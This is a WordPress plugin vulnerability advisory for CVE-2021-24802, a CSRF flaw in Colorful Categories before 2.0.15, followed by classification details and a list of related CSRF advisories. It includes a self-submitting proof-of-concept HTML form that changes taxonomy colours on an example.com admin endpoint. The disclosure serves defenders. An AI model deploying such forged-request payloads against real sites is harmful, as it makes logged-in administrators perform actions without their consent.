Colorful Categories < 2.0.15 – Arbitrary Colors Update via CSRF | CVE 2021-24802 | Plugin Vulnerabilities

Description

The plugin does not enforce nonce checks which could allow attackers to make a logged in admin or editor change taxonomy colors via a CSRF attack

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="post" id="csrf">
<input type="hidden" name="action" value="update_color_options_array">
<input type="hidden" name="termId" value="1">
<input type="hidden" name="taxonomy" value="category">
<input type="hidden" name="color" value="#FF0000">
</form><script>csrf.submit()</script>

Affects Plugins

colorful-categories

Fixed in 2.0.15

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

d92db61f-341c-4f3f-b962-326194ddbd1e

Timeline

Publicly Published

2021-10-13 (about 2 years ago)

Added

2021-10-13 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2023-10-03

Title

Category Meta <= 1.2.8 - CSRF

Published

2024-04-11

Title

ELEX WooCommerce Dynamic Pricing and Discounts < 2.1.3 - Cross-Site Request Forgery

Published

2021-08-16

Title

Event Espresso 4 Decaf < 4.10.12 - Cross-Site Request Forgery

Published

2022-11-30

Title

Advanced Coupons for WooCommerce Coupons < 4.5.0.1 - Notice Dismiss via CSRF

Published

2023-01-02

Title

Booster for WooCommerce - Multiple CSRF